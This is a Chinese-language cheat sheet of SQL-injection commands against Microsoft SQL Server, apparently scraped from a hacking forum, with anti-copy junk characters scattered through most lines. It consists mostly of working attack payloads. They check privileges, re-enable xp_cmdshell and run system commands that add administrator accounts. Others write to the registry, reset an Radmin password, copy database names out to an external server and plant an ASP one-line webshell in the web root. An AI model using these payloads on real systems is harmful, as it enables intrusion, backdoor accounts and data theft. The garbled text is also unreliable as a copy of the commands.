阿D常用的一些注入命令
/ k5 y" e. q6 o/ n9 X//看看是什么权限的
" J1 L( g3 m3 s. O9 h& `. [6 }; [and 1=(Select IS_MEMBER('db_owner'))4 ~5 w* S( W! b; T+ `; N' [ M
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--9 g; c7 r7 l# H1 x# X: R
//检测是否有读取某数据库的权限8 R3 p* `# z' U
and 1= (Select HAS_DBACCESS('master'))2 k% q i1 b7 m3 A; q' j' q
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
数字类型
% X1 K% s/ o# w i: z2 Dand char(124)%2Buser%2Bchar(124)=0
字符类型
2 N8 k9 {- O' N( d' and char(124)%2Buser%2Bchar(124)=0 and ''='/ _8 m8 Y9 O7 w0 H4 P4 U' m
搜索类型$ D; {9 W) Y; u% ~) B2 a
' and char(124)%2Buser%2Bchar(124)=0 and '%'='/ N w" [! r% k9 j
( ^) u) @4 s; `5 j! N! W爆用户名
9 n( l. E1 h; Hand user>0/ l- I- G9 Y }8 V
' and user>0 and ''='
D+ A3 V% @1 y- y, o& t9 x检测是否为SA权限; M2 G8 k& q$ h. G# s! a
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
* T! ?2 t O; h6 v7 _And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --% n; m- p& p4 ?- l5 R% U# g: [
/ f' t! \) Z l检测是不是MSSQL数据库! M6 I1 j" S) |0 c* j$ c: y
and exists (select * from sysobjects);--
) \1 |7 Z! t4 O0 R) Z检测是否支持多行
, e6 A5 {" e1 Z0 |;declare @d int;-- ' _) l: C9 \1 {( C. l$ b6 g
; H2 X# C! }& ^ j9 N恢复 xp_cmdshell
+ T) ]# _$ M) X! p. N- F8 _0 W" z0 ];exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--* v' W* m: k6 n" N1 R
$ p$ @, Z5 T5 X: B. d* \+ zselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') * h/ o9 q4 L+ b* H
. V& a. D/ _/ M* t: M/ ^//-----------------------
, q# M5 h: n/ J" k! l4 {- ~7 q9 c8 E// 执行命令
# ]5 S8 q0 `5 `1 T8 o( R//-----------------------
6 y0 t2 N& u+ }. S- j2 ? A+ @首先开启沙盘模式:
& y. W8 ^4 o- m, A' W' G, texec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1; i G& d, Z$ w6 E. z9 f, X$ P! B
然后利用jet.oledb执行系统命令
5 p/ T* Z; m* F/ k' _4 Y1 }select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'), t2 V7 t( Z8 M
, B; h# Y3 c; E# Q执行命令
( `" O# Y; g* g5 T0 d" U9 @& C;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--$ o) X8 }1 s/ I2 M6 E/ U
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
! [9 Y0 V- y& ~! @0 C W判断xp_cmdshell扩展存储过程是否存在:
, |9 G9 R8 D5 @: mhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')5 J, E! Q# Q: x" {
写注册表
( }$ Z$ v% ~* ^ aexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
( W; @; d P! v' e* YREG_SZ
; s3 L ?1 d3 J7 P' l读注册表+ n! A3 B ~% ?: K1 D
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
读取目录内容
8 a' b/ `. m( M# s) O( iexec master..xp_dirtree 'c:\winnt\system32\',1,1
数据库备份- K% r% ?1 j2 H1 C, o9 t) k+ r8 k
backup database pubs to disk = 'c:\123.bak'
8 V. q' _# P! N//爆出长度' v' S9 ^# @3 J. i0 j& t
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
+ ^6 b% l6 N. G' L& l0 c更改sa口令方法:用sql综合利用工具连接后,执行命令:) v5 G! b* S+ t* D1 ] v
exec sp_password NULL,'新密码','sa'2 d7 u0 o& p2 t. }6 \+ i" E
添加和删除一个SA权限的用户test:3 {6 x4 v5 O* ]0 L2 V
exec master.dbo.sp_addlogin test,ptlove8 y" H- U' W" H% f, a9 k: {6 [
exec master.dbo.sp_addsrvrolemember test,sysadmin
删除扩展存储过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
添加扩展存储过程
, ^: P3 }0 R5 g, m0 `$ KEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
. C- j* N9 I2 P( s3 o2 m0 i! B3 SGRANT exec On xp_proxiedadata TO public
5 A* R1 p. r6 H% N$ o4 a2 f" ~停掉或激活某个服务。
" k! R8 T \, ^8 e, n V& Mexec master..xp_servicecontrol 'stop','schedule': R5 c, {0 U9 W, v: E7 g
exec master..xp_servicecontrol 'start','schedule'
dbo.xp_subdirs+ `2 k( } f. V, s$ W6 Q
" w- X; }0 l; Z; ~只列某个目录下的子目录。; a4 V( y5 V* z& u- F' _
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp' U% ]. _8 ~2 H0 D
dbo.xp_makecab
2 v) @6 P3 A8 V! d8 J" E' Q% M0 I将目标多个档案压缩到某个目标档案之内。
0 y' w& F3 P% Y1 w; c; n* p所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。3 {. J; Z3 {6 D% N; j: b7 ?3 Q
- J' e1 g& h% m- f# c( adbo.xp_makecab! T0 s$ f, j1 H2 P7 K. {
'c:\test.cab','mszip',1,
$ Z7 S! G; {; s. Q5 A( ]5 M B+ G5 S& R'C:\Inetpub\wwwroot\SQLInject\login.asp',
, f; P, {& h2 ?3 Z; c/ R6 d'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
; B3 T2 Z$ U0 Jxp_terminate_process# U" \$ R" T' Z4 ]5 x# `
停掉某个执行中的程序,但赋予的参数是 Process ID。
; O) B+ E3 E$ ~- c$ C4 H利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID' q% i4 E2 r$ Q' k7 V( W* t; j$ L
, ]; _1 l3 L1 c* Q5 Xxp_terminate_process 2484
' s+ X. @5 {1 w& t( {, Z* zxp_unpackcab
- p- S6 w3 N( z0 |解开压缩档。- \& N" H5 ]: c4 u
8 W1 Z. {& `+ M) yxp_unpackcab 'c:\test.cab','c:\temp',1
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234+ y! Q! j* r! z9 T! r6 `' P/ I3 v
create database lcx;
, [& A8 ?6 b `; FCreate TABLE ku(name nvarchar(256) null);
$ d9 B1 u( s4 s" ECreate TABLE biao(id int NULL,name nvarchar(256) null);
//得到数据库名# u6 ~2 ^6 B% k# G* e3 q; `5 i
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases# `: U8 k, ?' y6 V
0 d5 d B) |3 y% \//在Master中创建表,看看权限怎样9 [9 X$ \ K, R
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
用 sp_makewebtask直接在web目录里写入一句话马:
! f( [; N0 g, }; D, ^http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--# ~3 P3 R" z3 h; c1 Y
//更新表内容3 ?; E q5 f p/ Q
Update films SET kind = 'Dramatic' Where id = 123
! a& N: s9 i/ W6 y! U//删除内容
i% z# G2 u$ e4 Idelete from table_name where Stockid = 3 |